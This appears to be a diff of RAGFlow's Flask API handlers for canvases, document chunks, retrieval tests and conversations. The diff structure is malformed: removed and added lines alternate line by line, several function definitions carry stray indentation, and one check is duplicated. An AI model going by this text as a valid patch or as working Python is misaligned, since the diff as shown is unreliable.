        return get_data_error_result(message=f"Error getting history files: {e}")
 #api get version dsl of canvas
@manager.route('/getversion/<version_id>', methods=['GET'])  # noqa: F821
@login_required
 def getversion( version_id):
    try:
        e, version = UserCanvasVersionService.get_by_id(version_id)
        if version:
            return get_json_result(data=version.to_dict())
    except Exception as e:
        return get_json_result(data=f"Error getting history file: {e}")
@manager.route('/listteam', methods=['GET'])  # noqa: F821
@login_required
 def list_kbs():
    keywords = request.args.get("keywords", "")
    page_number = int(request.args.get("page", 1))
    items_per_page = int(request.args.get("page_size", 150))
    orderby = request.args.get("orderby", "create_time")
    desc = request.args.get("desc", True)
    try:
        tenants = TenantService.get_joined_tenants_by_user_id(current_user.id)
        kbs, total = UserCanvasService.get_by_tenant_ids(
            [m["tenant_id"] for m in tenants], current_user.id, page_number,
            items_per_page, orderby, desc, keywords)
        return get_json_result(data={"kbs": kbs, "total": total})
    except Exception as e:
        return server_error_response(e)
@manager.route('/setting', methods=['POST'])  # noqa: F821
@validate_request("id", "title", "permission")
@login_required
 def setting():
    req = request.json
    req["user_id"] = current_user.id
    e,flow = UserCanvasService.get_by_id(req["id"])
    if not e:
        return get_data_error_result(message="canvas not found.")
    flow = flow.to_dict()
    flow["title"] = req["title"]
    if req["description"]:
        flow["description"] = req["description"]
    if req["permission"]:
        flow["permission"] = req["permission"]
    if req["avatar"]:
        flow["avatar"] = req["avatar"]
    if not UserCanvasService.query(user_id=current_user.id, id=req["id"]):
        return get_json_result(
            data=False, message='Only owner of canvas authorized for this operation.',
            code=RetCode.OPERATING_ERROR)
    num= UserCanvasService.update_by_id(req["id"], flow)
    return get_json_result(data=num)
@manager.route('/trace', methods=['GET'])  # noqa: F821
 def trace():
    cvs_id = request.args.get("canvas_id")
    msg_id = request.args.get("message_id")
    try:
        bin = REDIS_CONN.get(f"{cvs_id}-{msg_id}-logs")
        if not bin:
            return get_json_result(data={})
        return get_json_result(data=json.loads(bin.encode("utf-8")))
    except Exception as e:
        logging.exception(e)
@manager.route('/<canvas_id>/sessions', methods=['GET'])  # noqa: F821
@login_required
 def sessions(canvas_id):
    tenant_id = current_user.id
    if not UserCanvasService.query(user_id=tenant_id, id=canvas_id):
        return get_error_data_result(message=f"You don't own the agent {canvas_id}.")
    user_id = request.args.get("user_id")
    page_number = int(request.args.get("page", 1))
    items_per_page = int(request.args.get("page_size", 30))
    keywords = request.args.get("keywords")
    from_date = request.args.get("from_date")
    to_date = request.args.get("to_date")
    orderby = request.args.get("orderby", "update_time")
    if request.args.get("desc") == "False" or request.args.get("desc") == "false":
        desc = False
    else:
        desc = True
    # dsl defaults to True in all cases except for False and false
    include_dsl = request.args.get("dsl") != "False" and request.args.get("dsl") != "false"
    total, sess = API4ConversationService.get_list(canvas_id, tenant_id, page_number, items_per_page, orderby, desc,
                                             None, user_id, include_dsl, keywords, from_date, to_date)
    try:
        return get_json_result(data={"total": total, "sessions": sess})
    except Exception as e:
        return server_error_response(e)
--- a/api/apps/chunk_app.py
+++ b/api/apps/chunk_app.py
@ -1,267 +1,393 @@
-#
+#
-#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
+#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
-#
+#
-#  Licensed under the Apache License, Version 2.0 (the "License");
+#  Licensed under the Apache License, Version 2.0 (the "License");
-#  you may not use this file except in compliance with the License.
+#  you may not use this file except in compliance with the License.
-#  You may obtain a copy of the License at
+#  You may obtain a copy of the License at
-#
+#
-#      http://www.apache.org/licenses/LICENSE-2.0
+#      http://www.apache.org/licenses/LICENSE-2.0
-#
+#
-#  Unless required by applicable law or agreed to in writing, software
+#  Unless required by applicable law or agreed to in writing, software
-#  distributed under the License is distributed on an "AS IS" BASIS,
+#  distributed under the License is distributed on an "AS IS" BASIS,
-#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#  See the License for the specific language governing permissions and
+#  See the License for the specific language governing permissions and
-#  limitations under the License.
+#  limitations under the License.
-#
+#
-import datetime
+import datetime
-
+import json
-from flask import request
+import re
-from flask_login import login_required, current_user
+
-from elasticsearch_dsl import Q
+import xxhash
-
+from flask import request
-from rag.app.qa import rmPrefix, beAdoc
+from flask_login import current_user, login_required
-from rag.nlp import search, huqie
+
-from rag.utils import ELASTICSEARCH, rmSpace
+from api import settings
-from api.db import LLMType, ParserType
+from api.db import LLMType, ParserType
-from api.db.services.knowledgebase_service import KnowledgebaseService
+from api.db.services.document_service import DocumentService
-from api.db.services.llm_service import TenantLLMService
+from api.db.services.knowledgebase_service import KnowledgebaseService
-from api.db.services.user_service import UserTenantService
+from api.db.services.llm_service import LLMBundle
-from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
+from api.db.services.user_service import UserTenantService
-from api.db.services.document_service import DocumentService
+from api.utils.api_utils import get_data_error_result, get_json_result, server_error_response, validate_request
-from api.settings import RetCode, retrievaler
+from rag.app.qa import beAdoc, rmPrefix
-from api.utils.api_utils import get_json_result
+from rag.app.tag import label_question
-import hashlib
+from rag.nlp import rag_tokenizer, search
-import re
+from rag.prompts import cross_languages, keyword_extraction
-
+from rag.settings import PAGERANK_FLD
-
+from rag.utils import rmSpace
-@manager.route('/list', methods=['POST'])
+
-@login_required
+
-@validate_request("doc_id")
+@manager.route('/list', methods=['POST'])  # noqa: F821
-def list():
+@login_required
-    req = request.json
+@validate_request("doc_id")
-    doc_id = req["doc_id"]
+def list_chunk():
-    page = int(req.get("page", 1))
+    req = request.json
-    size = int(req.get("size", 30))
+    doc_id = req["doc_id"]
-    question = req.get("keywords", "")
+    page = int(req.get("page", 1))
-    try:
+    size = int(req.get("size", 30))
-        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
+    question = req.get("keywords", "")
-        if not tenant_id:
+    try:
-            return get_data_error_result(retmsg="Tenant not found!")
+        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
-        e, doc = DocumentService.get_by_id(doc_id)
+        if not tenant_id:
-        if not e:
+            return get_data_error_result(message="Tenant not found!")
-            return get_data_error_result(retmsg="Document not found!")
+        e, doc = DocumentService.get_by_id(doc_id)
-        query = {
+        if not e:
-            "doc_ids": [doc_id], "page": page, "size": size, "question": question, "sort": True
+            return get_data_error_result(message="Document not found!")
-        }
+        kb_ids = KnowledgebaseService.get_kb_ids(tenant_id)
-        if "available_int" in req:
+        query = {
-            query["available_int"] = int(req["available_int"])
+            "doc_ids": [doc_id], "page": page, "size": size, "question": question, "sort": True
-        sres = retrievaler.search(query, search.index_name(tenant_id))
+        }
-        res = {"total": sres.total, "chunks": [], "doc": doc.to_dict()}
+        if "available_int" in req:
-        for id in sres.ids:
+            query["available_int"] = int(req["available_int"])
-            d = {
+        sres = settings.retrievaler.search(query, search.index_name(tenant_id), kb_ids, highlight=True)
-                "chunk_id": id,
+        res = {"total": sres.total, "chunks": [], "doc": doc.to_dict()}
-                "content_with_weight": rmSpace(sres.highlight[id]) if question and id in  sres.highlight else sres.field[id].get(
+        for id in sres.ids:
-                    "content_with_weight", ""),
+            d = {
-                "doc_id": sres.field[id]["doc_id"],
+                "chunk_id": id,
-                "docnm_kwd": sres.field[id]["docnm_kwd"],
+                "content_with_weight": rmSpace(sres.highlight[id]) if question and id in sres.highlight else sres.field[
-                "important_kwd": sres.field[id].get("important_kwd", []),
+                    id].get(
-                "img_id": sres.field[id].get("img_id", ""),
+                    "content_with_weight", ""),
-                "available_int": sres.field[id].get("available_int", 1),
+                "doc_id": sres.field[id]["doc_id"],
-                "positions": sres.field[id].get("position_int", "").split("\t")
+                "docnm_kwd": sres.field[id]["docnm_kwd"],
-            }
+                "important_kwd": sres.field[id].get("important_kwd", []),
-            if len(d["positions"]) % 5 == 0:
+                "question_kwd": sres.field[id].get("question_kwd", []),
-                poss = []
+                "image_id": sres.field[id].get("img_id", ""),
-                for i in range(0, len(d["positions"]), 5):
+                "available_int": int(sres.field[id].get("available_int", 1)),
-                    poss.append([float(d["positions"][i]), float(d["positions"][i + 1]), float(d["positions"][i + 2]),
+                "positions": sres.field[id].get("position_int", []),
-                                 float(d["positions"][i + 3]), float(d["positions"][i + 4])])
+            }
-                d["positions"] = poss
+            assert isinstance(d["positions"], list)
-            res["chunks"].append(d)
+            assert len(d["positions"]) == 0 or (isinstance(d["positions"][0], list) and len(d["positions"][0]) == 5)
-        return get_json_result(data=res)
+            res["chunks"].append(d)
-    except Exception as e:
+        return get_json_result(data=res)
-        if str(e).find("not_found") > 0:
+    except Exception as e:
-            return get_json_result(data=False, retmsg=f'No chunk found!',
+        if str(e).find("not_found") > 0:
-                                   retcode=RetCode.DATA_ERROR)
+            return get_json_result(data=False, message='No chunk found!',
-        return server_error_response(e)
+                                   code=settings.RetCode.DATA_ERROR)
-
+        return server_error_response(e)
-
+
-@manager.route('/get', methods=['GET'])
+
-@login_required
+@manager.route('/get', methods=['GET'])  # noqa: F821
-def get():
+@login_required
-    chunk_id = request.args["chunk_id"]
+def get():
-    try:
+    chunk_id = request.args["chunk_id"]
-        tenants = UserTenantService.query(user_id=current_user.id)
+    try:
-        if not tenants:
+        tenants = UserTenantService.query(user_id=current_user.id)
-            return get_data_error_result(retmsg="Tenant not found!")
+        if not tenants:
-        res = ELASTICSEARCH.get(
+            return get_data_error_result(message="Tenant not found!")
-            chunk_id, search.index_name(
+        for tenant in tenants:
-                tenants[0].tenant_id))
+            kb_ids = KnowledgebaseService.get_kb_ids(tenant.tenant_id)
-        if not res.get("found"):
+            chunk = settings.docStoreConn.get(chunk_id, search.index_name(tenant.tenant_id), kb_ids)
-            return server_error_response("Chunk not found")
+            if chunk:
-        id = res["_id"]
+                break
-        res = res["_source"]
+        if chunk is None:
-        res["chunk_id"] = id
+            return server_error_response(Exception("Chunk not found"))
-        k = []
+
-        for n in res.keys():
+        k = []
-            if re.search(r"(_vec$|_sm_|_tks|_ltks)", n):
+        for n in chunk.keys():
-                k.append(n)
+            if re.search(r"(_vec$|_sm_|_tks|_ltks)", n):
-        for n in k:
+                k.append(n)
-            del res[n]
+        for n in k:
-
+            del chunk[n]
-        return get_json_result(data=res)
+
-    except Exception as e:
+        return get_json_result(data=chunk)
-        if str(e).find("NotFoundError") >= 0:
+    except Exception as e:
-            return get_json_result(data=False, retmsg=f'Chunk not found!',
+        if str(e).find("NotFoundError") >= 0:
-                                   retcode=RetCode.DATA_ERROR)
+            return get_json_result(data=False, message='Chunk not found!',
-        return server_error_response(e)
+                                   code=settings.RetCode.DATA_ERROR)
-
+        return server_error_response(e)
-
+
-@manager.route('/set', methods=['POST'])
+
-@login_required
+@manager.route('/set', methods=['POST'])  # noqa: F821
-@validate_request("doc_id", "chunk_id", "content_with_weight",
+@login_required
-                  "important_kwd")
+@validate_request("doc_id", "chunk_id", "content_with_weight")
-def set():
+def set():
-    req = request.json
+    req = request.json
-    d = {
+    d = {
-        "id": req["chunk_id"],
+        "id": req["chunk_id"],
-        "content_with_weight": req["content_with_weight"]}
+        "content_with_weight": req["content_with_weight"]}
-    d["content_ltks"] = huqie.qie(req["content_with_weight"])
+    d["content_ltks"] = rag_tokenizer.tokenize(req["content_with_weight"])
-    d["content_sm_ltks"] = huqie.qieqie(d["content_ltks"])
+    d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
-    d["important_kwd"] = req["important_kwd"]
+    if "important_kwd" in req:
-    d["important_tks"] = huqie.qie(" ".join(req["important_kwd"]))
+        if not isinstance(req["important_kwd"], list):
-    if "available_int" in req:
+            return get_data_error_result(message="`important_kwd` should be a list")
-        d["available_int"] = req["available_int"]
+        d["important_kwd"] = req["important_kwd"]
-
+        d["important_tks"] = rag_tokenizer.tokenize(" ".join(req["important_kwd"]))
-    try:
+    if "question_kwd" in req:
-        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
+        if not isinstance(req["question_kwd"], list):
-        if not tenant_id:
+            return get_data_error_result(message="`question_kwd` should be a list")
-            return get_data_error_result(retmsg="Tenant not found!")
+        d["question_kwd"] = req["question_kwd"]
-        embd_mdl = TenantLLMService.model_instance(
+        d["question_tks"] = rag_tokenizer.tokenize("\n".join(req["question_kwd"]))
-            tenant_id, LLMType.EMBEDDING.value)
+    if "tag_kwd" in req:
-        e, doc = DocumentService.get_by_id(req["doc_id"])
+        d["tag_kwd"] = req["tag_kwd"]
-        if not e:
+    if "tag_feas" in req:
-            return get_data_error_result(retmsg="Document not found!")
+        d["tag_feas"] = req["tag_feas"]
-
+    if "available_int" in req:
-        if doc.parser_id == ParserType.QA:
+        d["available_int"] = req["available_int"]
-            arr = [
+
-                t for t in re.split(
+    try:
-                    r"[\n\t]",
+        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
-                    req["content_with_weight"]) if len(t) > 1]
+        if not tenant_id:
-            if len(arr) != 2:
+            return get_data_error_result(message="Tenant not found!")
-                return get_data_error_result(
+
-                    retmsg="Q&A must be separated by TAB/ENTER key.")
+        embd_id = DocumentService.get_embd_id(req["doc_id"])
-            q, a = rmPrefix(arr[0]), rmPrefix[arr[1]]
+        embd_mdl = LLMBundle(tenant_id, LLMType.EMBEDDING, embd_id)
-            d = beAdoc(d, arr[0], arr[1], not any(
+
-                [huqie.is_chinese(t) for t in q + a]))
+        e, doc = DocumentService.get_by_id(req["doc_id"])
-
+        if not e:
-        v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
+            return get_data_error_result(message="Document not found!")
-        v = 0.1 * v[0] + 0.9 * v[1] if doc.parser_id != ParserType.QA else v[1]
+
-        d["q_%d_vec" % len(v)] = v.tolist()
+        if doc.parser_id == ParserType.QA:
-        ELASTICSEARCH.upsert([d], search.index_name(tenant_id))
+            arr = [
-        return get_json_result(data=True)
+                t for t in re.split(
-    except Exception as e:
+                    r"[\n\t]",
-        return server_error_response(e)
+                    req["content_with_weight"]) if len(t) > 1]
-
+            q, a = rmPrefix(arr[0]), rmPrefix("\n".join(arr[1:]))
-
+            d = beAdoc(d, q, a, not any(
-@manager.route('/switch', methods=['POST'])
+                [rag_tokenizer.is_chinese(t) for t in q + a]))
-@login_required
+
-@validate_request("chunk_ids", "available_int", "doc_id")
+        v, c = embd_mdl.encode([doc.name, req["content_with_weight"] if not d.get("question_kwd") else "\n".join(d["question_kwd"])])
-def switch():
+        v = 0.1 * v[0] + 0.9 * v[1] if doc.parser_id != ParserType.QA else v[1]
-    req = request.json
+        d["q_%d_vec" % len(v)] = v.tolist()
-    try:
+        settings.docStoreConn.update({"id": req["chunk_id"]}, d, search.index_name(tenant_id), doc.kb_id)
-        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
+        return get_json_result(data=True)
-        if not tenant_id:
+    except Exception as e:
-            return get_data_error_result(retmsg="Tenant not found!")
+        return server_error_response(e)
-        if not ELASTICSEARCH.upsert([{"id": i, "available_int": int(req["available_int"])} for i in req["chunk_ids"]],
+
-                                    search.index_name(tenant_id)):
+
-            return get_data_error_result(retmsg="Index updating failure")
+@manager.route('/switch', methods=['POST'])  # noqa: F821
-        return get_json_result(data=True)
+@login_required
-    except Exception as e:
+@validate_request("chunk_ids", "available_int", "doc_id")
-        return server_error_response(e)
+def switch():
-
+    req = request.json
-
+    try:
-@manager.route('/rm', methods=['POST'])
+        e, doc = DocumentService.get_by_id(req["doc_id"])
-@login_required
+        if not e:
-@validate_request("chunk_ids")
+            return get_data_error_result(message="Document not found!")
-def rm():
+        for cid in req["chunk_ids"]:
-    req = request.json
+            if not settings.docStoreConn.update({"id": cid},
-    try:
+                                                {"available_int": int(req["available_int"])},
-        if not ELASTICSEARCH.deleteByQuery(
+                                                search.index_name(DocumentService.get_tenant_id(req["doc_id"])),
-                Q("ids", values=req["chunk_ids"]), search.index_name(current_user.id)):
+                                                doc.kb_id):
-            return get_data_error_result(retmsg="Index updating failure")
+                return get_data_error_result(message="Index updating failure")
-        return get_json_result(data=True)
+        return get_json_result(data=True)
-    except Exception as e:
+    except Exception as e:
-        return server_error_response(e)
+        return server_error_response(e)
-
+
-
+
-@manager.route('/create', methods=['POST'])
+@manager.route('/rm', methods=['POST'])  # noqa: F821
-@login_required
+@login_required
-@validate_request("doc_id", "content_with_weight")
+@validate_request("chunk_ids", "doc_id")
-def create():
+def rm():
-    req = request.json
+    from rag.utils.storage_factory import STORAGE_IMPL
-    md5 = hashlib.md5()
+    req = request.json
-    md5.update((req["content_with_weight"] + req["doc_id"]).encode("utf-8"))
+    try:
-    chunck_id = md5.hexdigest()
+        e, doc = DocumentService.get_by_id(req["doc_id"])
-    d = {"id": chunck_id, "content_ltks": huqie.qie(req["content_with_weight"]),
+        if not e:
-         "content_with_weight": req["content_with_weight"]}
+            return get_data_error_result(message="Document not found!")
-    d["content_sm_ltks"] = huqie.qieqie(d["content_ltks"])
+        if not settings.docStoreConn.delete({"id": req["chunk_ids"]},
-    d["important_kwd"] = req.get("important_kwd", [])
+                                            search.index_name(DocumentService.get_tenant_id(req["doc_id"])),
-    d["important_tks"] = huqie.qie(" ".join(req.get("important_kwd", [])))
+                                            doc.kb_id):
-    d["create_time"] = str(datetime.datetime.now()).replace("T", " ")[:19]
+            return get_data_error_result(message="Chunk deleting failure")
-    d["create_timestamp_flt"] = datetime.datetime.now().timestamp()
+        deleted_chunk_ids = req["chunk_ids"]
-
+        chunk_number = len(deleted_chunk_ids)
-    try:
+        DocumentService.decrement_chunk_num(doc.id, doc.kb_id, 1, chunk_number, 0)
-        e, doc = DocumentService.get_by_id(req["doc_id"])
+        for cid in deleted_chunk_ids:
-        if not e:
+            if STORAGE_IMPL.obj_exist(doc.kb_id, cid):
-            return get_data_error_result(retmsg="Document not found!")
+                STORAGE_IMPL.rm(doc.kb_id, cid)
-        d["kb_id"] = [doc.kb_id]
+        return get_json_result(data=True)
-        d["docnm_kwd"] = doc.name
+    except Exception as e:
-        d["doc_id"] = doc.id
+        return server_error_response(e)
-
+
-        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
+
-        if not tenant_id:
+@manager.route('/create', methods=['POST'])  # noqa: F821
-            return get_data_error_result(retmsg="Tenant not found!")
+@login_required
-
+@validate_request("doc_id", "content_with_weight")
-        embd_mdl = TenantLLMService.model_instance(
+def create():
-            tenant_id, LLMType.EMBEDDING.value)
+    req = request.json
-        v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
+    chunck_id = xxhash.xxh64((req["content_with_weight"] + req["doc_id"]).encode("utf-8")).hexdigest()
-        DocumentService.increment_chunk_num(req["doc_id"], doc.kb_id, c, 1, 0)
+    d = {"id": chunck_id, "content_ltks": rag_tokenizer.tokenize(req["content_with_weight"]),
-        v = 0.1 * v[0] + 0.9 * v[1]
+         "content_with_weight": req["content_with_weight"]}
-        d["q_%d_vec" % len(v)] = v.tolist()
+    d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
-        ELASTICSEARCH.upsert([d], search.index_name(tenant_id))
+    d["important_kwd"] = req.get("important_kwd", [])
-        return get_json_result(data={"chunk_id": chunck_id})
+    if not isinstance(d["important_kwd"], list):
-    except Exception as e:
+        return get_data_error_result(message="`important_kwd` is required to be a list")
-        return server_error_response(e)
+    d["important_tks"] = rag_tokenizer.tokenize(" ".join(d["important_kwd"]))
-
+    d["question_kwd"] = req.get("question_kwd", [])
-
+    if not isinstance(d["question_kwd"], list):
-@manager.route('/retrieval_test', methods=['POST'])
+        return get_data_error_result(message="`question_kwd` is required to be a list")
-@login_required
+    d["question_tks"] = rag_tokenizer.tokenize("\n".join(d["question_kwd"]))
-@validate_request("kb_id", "question")
+    d["create_time"] = str(datetime.datetime.now()).replace("T", " ")[:19]
-def retrieval_test():
+    d["create_timestamp_flt"] = datetime.datetime.now().timestamp()
-    req = request.json
+    if "tag_feas" in req:
-    page = int(req.get("page", 1))
+        d["tag_feas"] = req["tag_feas"]
-    size = int(req.get("size", 30))
+    if "tag_feas" in req:
-    question = req["question"]
+        d["tag_feas"] = req["tag_feas"]
-    kb_id = req["kb_id"]
+
-    doc_ids = req.get("doc_ids", [])
+    try:
-    similarity_threshold = float(req.get("similarity_threshold", 0.2))
+        e, doc = DocumentService.get_by_id(req["doc_id"])
-    vector_similarity_weight = float(req.get("vector_similarity_weight", 0.3))
+        if not e:
-    top = int(req.get("top_k", 1024))
+            return get_data_error_result(message="Document not found!")
-    try:
+        d["kb_id"] = [doc.kb_id]
-        e, kb = KnowledgebaseService.get_by_id(kb_id)
+        d["docnm_kwd"] = doc.name
-        if not e:
+        d["title_tks"] = rag_tokenizer.tokenize(doc.name)
-            return get_data_error_result(retmsg="Knowledgebase not found!")
+        d["doc_id"] = doc.id
-
+
-        embd_mdl = TenantLLMService.model_instance(
+        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
-            kb.tenant_id, LLMType.EMBEDDING.value, llm_name=kb.embd_id)
+        if not tenant_id:
-        ranks = retrievaler.retrieval(question, embd_mdl, kb.tenant_id, [kb_id], page, size, similarity_threshold,
+            return get_data_error_result(message="Tenant not found!")
-                                      vector_similarity_weight, top, doc_ids)
+
-        for c in ranks["chunks"]:
+        e, kb = KnowledgebaseService.get_by_id(doc.kb_id)
-            if "vector" in c:
+        if not e:
-                del c["vector"]
+            return get_data_error_result(message="Knowledgebase not found!")
-
+        if kb.pagerank:
-        return get_json_result(data=ranks)
+            d[PAGERANK_FLD] = kb.pagerank
-    except Exception as e:
+
-        if str(e).find("not_found") > 0:
+        embd_id = DocumentService.get_embd_id(req["doc_id"])
-            return get_json_result(data=False, retmsg=f'No chunk found! Check the chunk status please!',
+        embd_mdl = LLMBundle(tenant_id, LLMType.EMBEDDING.value, embd_id)
-                                   retcode=RetCode.DATA_ERROR)
+
-        return server_error_response(e)
+        v, c = embd_mdl.encode([doc.name, req["content_with_weight"] if not d["question_kwd"] else "\n".join(d["question_kwd"])])
        v = 0.1 * v[0] + 0.9 * v[1]
        d["q_%d_vec" % len(v)] = v.tolist()
        settings.docStoreConn.insert([d], search.index_name(tenant_id), doc.kb_id)
        DocumentService.increment_chunk_num(
            doc.id, doc.kb_id, c, 1, 0)
        return get_json_result(data={"chunk_id": chunck_id})
    except Exception as e:
        return server_error_response(e)
@manager.route('/retrieval_test', methods=['POST'])  # noqa: F821
@login_required
@validate_request("kb_id", "question")
 def retrieval_test():
    req = request.json
    page = int(req.get("page", 1))
    size = int(req.get("size", 30))
    question = req["question"]
    kb_ids = req["kb_id"]
    if isinstance(kb_ids, str):
        kb_ids = [kb_ids]
    doc_ids = req.get("doc_ids", [])
    similarity_threshold = float(req.get("similarity_threshold", 0.0))
    vector_similarity_weight = float(req.get("vector_similarity_weight", 0.3))
    use_kg = req.get("use_kg", False)
    top = int(req.get("top_k", 1024))
    langs = req.get("cross_languages", [])
    tenant_ids = []
    try:
        tenants = UserTenantService.query(user_id=current_user.id)
        for kb_id in kb_ids:
            for tenant in tenants:
                if KnowledgebaseService.query(
                        tenant_id=tenant.tenant_id, id=kb_id):
                    tenant_ids.append(tenant.tenant_id)
                    break
            else:
                return get_json_result(
                    data=False, message='Only owner of knowledgebase authorized for this operation.',
                    code=settings.RetCode.OPERATING_ERROR)
        e, kb = KnowledgebaseService.get_by_id(kb_ids[0])
        if not e:
            return get_data_error_result(message="Knowledgebase not found!")
        if langs:
            question = cross_languages(kb.tenant_id, None, question, langs)
        embd_mdl = LLMBundle(kb.tenant_id, LLMType.EMBEDDING.value, llm_name=kb.embd_id)
        rerank_mdl = None
        if req.get("rerank_id"):
            rerank_mdl = LLMBundle(kb.tenant_id, LLMType.RERANK.value, llm_name=req["rerank_id"])
        if req.get("keyword", False):
            chat_mdl = LLMBundle(kb.tenant_id, LLMType.CHAT)
            question += keyword_extraction(chat_mdl, question)
        labels = label_question(question, [kb])
        ranks = settings.retrievaler.retrieval(question, embd_mdl, tenant_ids, kb_ids, page, size,
                               similarity_threshold, vector_similarity_weight, top,
                               doc_ids, rerank_mdl=rerank_mdl, highlight=req.get("highlight"),
                               rank_feature=labels
                               )
        if use_kg:
            ck = settings.kg_retrievaler.retrieval(question,
                                                   tenant_ids,
                                                   kb_ids,
                                                   embd_mdl,
                                                   LLMBundle(kb.tenant_id, LLMType.CHAT))
            if ck["content_with_weight"]:
                ranks["chunks"].insert(0, ck)
        for c in ranks["chunks"]:
            c.pop("vector", None)
        ranks["labels"] = labels
        return get_json_result(data=ranks)
    except Exception as e:
        if str(e).find("not_found") > 0:
            return get_json_result(data=False, message='No chunk found! Check the chunk status please!',
                                   code=settings.RetCode.DATA_ERROR)
        return server_error_response(e)
@manager.route('/knowledge_graph', methods=['GET'])  # noqa: F821
@login_required
 def knowledge_graph():
    doc_id = request.args["doc_id"]
    tenant_id = DocumentService.get_tenant_id(doc_id)
    kb_ids = KnowledgebaseService.get_kb_ids(tenant_id)
    req = {
        "doc_ids": [doc_id],
        "knowledge_graph_kwd": ["graph", "mind_map"]
    }
    sres = settings.retrievaler.search(req, search.index_name(tenant_id), kb_ids)
    obj = {"graph": {}, "mind_map": {}}
    for id in sres.ids[:2]:
        ty = sres.field[id]["knowledge_graph_kwd"]
        try:
            content_json = json.loads(sres.field[id]["content_with_weight"])
        except Exception:
            continue
        if ty == 'mind_map':
            node_dict = {}
            def repeat_deal(content_json, node_dict):
                if 'id' in content_json:
                    if content_json['id'] in node_dict:
                        node_name = content_json['id']
                        content_json['id'] += f"({node_dict[content_json['id']]})"
                        node_dict[node_name] += 1
                    else:
                        node_dict[content_json['id']] = 1
                if 'children' in content_json and content_json['children']:
                    for item in content_json['children']:
                        repeat_deal(item, node_dict)
            repeat_deal(content_json, node_dict)
        obj[ty] = content_json
    return get_json_result(data=obj)
--- a/api/apps/conversation_app.py
+++ b/api/apps/conversation_app.py
@ -1,135 +1,411 @@
-#
+#
-#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
+#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
-#
+#
-#  Licensed under the Apache License, Version 2.0 (the "License");
+#  Licensed under the Apache License, Version 2.0 (the "License");
-#  you may not use this file except in compliance with the License.
+#  you may not use this file except in compliance with the License.
-#  You may obtain a copy of the License at
+#  You may obtain a copy of the License at
-#
+#
-#      http://www.apache.org/licenses/LICENSE-2.0
+#      http://www.apache.org/licenses/LICENSE-2.0
-#
+#
-#  Unless required by applicable law or agreed to in writing, software
+#  Unless required by applicable law or agreed to in writing, software
-#  distributed under the License is distributed on an "AS IS" BASIS,
+#  distributed under the License is distributed on an "AS IS" BASIS,
-#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#  See the License for the specific language governing permissions and
+#  See the License for the specific language governing permissions and
-#  limitations under the License.
+#  limitations under the License.
-#
+#
-from flask import request
+import json
-from flask_login import login_required
+import re
-from api.db.services.dialog_service import DialogService, ConversationService, chat
+import traceback
-from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
+from copy import deepcopy
-from api.utils import get_uuid
+
-from api.utils.api_utils import get_json_result
+import trio
-
+from flask import Response, request
-
+from flask_login import current_user, login_required
-@manager.route('/set', methods=['POST'])
+
-@login_required
+from api import settings
-def set_conversation():
+from api.db import LLMType
-    req = request.json
+from api.db.db_models import APIToken
-    conv_id = req.get("conversation_id")
+from api.db.services.conversation_service import ConversationService, structure_answer
-    if conv_id:
+from api.db.services.dialog_service import DialogService, ask, chat
-        del req["conversation_id"]
+from api.db.services.knowledgebase_service import KnowledgebaseService
-        try:
+from api.db.services.llm_service import LLMBundle, TenantService
-            if not ConversationService.update_by_id(conv_id, req):
+from api.db.services.user_service import UserTenantService
-                return get_data_error_result(retmsg="Conversation not found!")
+from api.utils.api_utils import get_data_error_result, get_json_result, server_error_response, validate_request
-            e, conv = ConversationService.get_by_id(conv_id)
+from graphrag.general.mind_map_extractor import MindMapExtractor
-            if not e:
+from rag.app.tag import label_question
-                return get_data_error_result(
+from rag.prompts.prompts import chunks_format
-                    retmsg="Fail to update a conversation!")
+
-            conv = conv.to_dict()
+
-            return get_json_result(data=conv)
+@manager.route("/set", methods=["POST"])  # noqa: F821
-        except Exception as e:
+@login_required
-            return server_error_response(e)
+def set_conversation():
-
+    req = request.json
-    try:
+    conv_id = req.get("conversation_id")
-        e, dia = DialogService.get_by_id(req["dialog_id"])
+    is_new = req.get("is_new")
-        if not e:
+    name = req.get("name", "New conversation")
-            return get_data_error_result(retmsg="Dialog not found")
+    req["user_id"] = current_user.id
-        conv = {
+
-            "id": get_uuid(),
+    if len(name) > 255:
-            "dialog_id": req["dialog_id"],
+        name = name[0:255]
-            "name": req.get("name", "New conversation"),
+
-            "message": [{"role": "assistant", "content": dia.prompt_config["prologue"]}]
+    del req["is_new"]
-        }
+    if not is_new:
-        ConversationService.save(**conv)
+        del req["conversation_id"]
-        e, conv = ConversationService.get_by_id(conv["id"])
+        try:
-        if not e:
+            if not ConversationService.update_by_id(conv_id, req):
-            return get_data_error_result(retmsg="Fail to new a conversation!")
+                return get_data_error_result(message="Conversation not found!")
-        conv = conv.to_dict()
+            e, conv = ConversationService.get_by_id(conv_id)
-        return get_json_result(data=conv)
+            if not e:
-    except Exception as e:
+                return get_data_error_result(message="Fail to update a conversation!")
-        return server_error_response(e)
+            conv = conv.to_dict()
-
+            return get_json_result(data=conv)
-
+        except Exception as e:
-@manager.route('/get', methods=['GET'])
+            return server_error_response(e)
-@login_required
+
-def get():
+    try:
-    conv_id = request.args["conversation_id"]
+        e, dia = DialogService.get_by_id(req["dialog_id"])
-    try:
+        if not e:
-        e, conv = ConversationService.get_by_id(conv_id)
+            return get_data_error_result(message="Dialog not found")
-        if not e:
